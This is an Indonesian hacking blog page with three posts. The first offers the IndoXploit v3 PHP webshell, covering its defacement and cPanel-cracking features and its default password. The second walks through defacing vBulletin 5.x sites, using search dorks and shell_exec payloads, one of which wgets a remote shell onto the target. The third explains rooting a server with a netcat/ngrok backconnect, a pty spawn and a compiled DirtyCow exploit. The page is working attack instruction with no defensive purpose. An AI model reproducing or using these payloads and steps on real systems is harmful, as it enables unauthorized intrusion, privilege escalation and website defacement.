Selasa, 01 Oktober 2019

Download Shell Backdoor IndoXploit V.3


Download Shell Backdoor IndoXploit V.3 – IndoXploit SHell atau sebagian orang menyebut “idx shell” adalah webshell atau backdoor yang ditulis dalam bahasa pemrograman PHP oleh founder Indoxploit yaitu Agus Setya R. Webshell ini memiliki fitur yang cukup powerfull karena seperti yang sudah diterangkan oleh pembuatnya, webshell ini memiliki kemampuan untuk melakukan bypass firewall pada banyak server yang memiliki keamanan tinggi.
Shell v3 ini merupakan pengembangan dari versi sebelumnya dengan beberapa fitur tambahan.

Login page
Shell Interface

Fitur Shell Backdoor IndoXploit V.3

  • Mass Password Change
  • Fake Root
  • Cpanel Crack
  • Mass Deface/Delete File
  • Zone-H Mass Submit

Shell Indoxploit versi 3 ini merupakan “command based” shell, yangmana sebagian besar fiturnya dipanggil menggunakan perintah. Untuk rincian perintah dan juga link download langsung saja ke link GitHub berikut:

    default pass shell : IndoXploit
Oke sekian artikel kali ini dan semoga bermanfaat.

vBulletin forum to RCE for version 5.0.* - 5.5.4 (Manual Version)


wokee welcome back with me orang yg paling gans, disini gw bakal ngasih tau cara deface dengan poc vBulletin forum to RCE manual yg lagi buming di dunia underground oke langsung saja pertama kalian ngedork dolo lah neh dork nya..

Dorks :

  • intext:"Powered By vBulletin Version 5.5.4"
  • inurl:"/forum" intext:"Powered By vBulletin Version 5.0.*"
Payload :

  • http://site.coli/ajax/render/widget_php 
oke di sini gw manual yah gak make tools karna gw gak suka yang singkat singkat :3, jika kalian udah dapet web targetnya kalian kasih payload nya kita liat itu web vuln apa kga..

jika sudah di kasih payload maka akan muncul Incorrect HTTP Method yg berarti HTTP Metode GET ndak bisa mesti HTTP Metode POST, sekarang kalian buka mozilla kalian dan buka HACKBAR nya


Jika syudah kalian centangkan pada Post dan pastekan payload ini...

widgetConfig[code]=echo shell_exec('uname -a'); exit;
jika sudah kalian coba coba menggantikan command nya contoh uname -a , id , pwd dll


jika berhasil tinggal kalian execution dengan uploadkan shell / uploader kalian dan ini payloadnya..

widgetConfig[code]=echo shell_exec('wget http://site.coli/shell.txt -O p.php'); exit;

nah jika sudah kalian bisa akses deh biasanya akses tersebut di DOCUMENT_ROOT atau HTTP://SITE.COM/AKSES.PHP.

Oke sekian terimakasih

Rooting server dengan localroot




heyy semuanya disini gw bakal kasih tutorial cara ngeroot server dengan localroot, oke yang pertama kalian siapkan alat tempurnya yaitu :

~ Akses shell klik untuk download shell
~ Localroot (untuk ngeroot server)
~ Ngrok (untuk backconnect) klik untuk download
~ Netcat (untuk Listening) klik untuk download

Oke langsung saja ke tutorial nya yang pertama kalian mesti set ngrok dan netcat nya yah di cmd atau terminal kalian.

(settingan untuk ngrok)

settingan untuk netcat

oke gambar yg di atas adalah settigannya port tcp di ngrok mesti sama dengan netcat ya, oke langsung saja untuk backconnect nya

settingan untuk backconnect di shell backdoor

nah kalian isikan server dan portnya pada shell itu dengan server ngrok dan port ngrok nya ya dan kalian backconnect deh.

penampakan jika berhasil backconnect

nah jika kalian sudah berhasil backconnect maka kurang lebih tampilanya seperti gambar di atas ini.
jika sudah kalian spawing shell dengan python perintah untuk spawing shell,

python -c 'import pty; pty.spawn("/bin/sh")'

jika sudah spawing shell nya kalian wget localroot nya tapi disini saya menggunakan localroot saya sendiri

wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c

jika sudah kalian gcc file localroot kalian dengan command seperti ini

gcc -pthread dirty.c -o dirty -lcrypt 
dan kalian chmod +x dirty nya dan jalankan ./dirty kalian dan masukan password kalian, ikuti gambar di bawah ini

 settingan proses rooting
jika sudah maka kalian bisa login SSH dengan Putty atau yang lainya.

sekian syudah tutorial dari saya dan terimakasih :)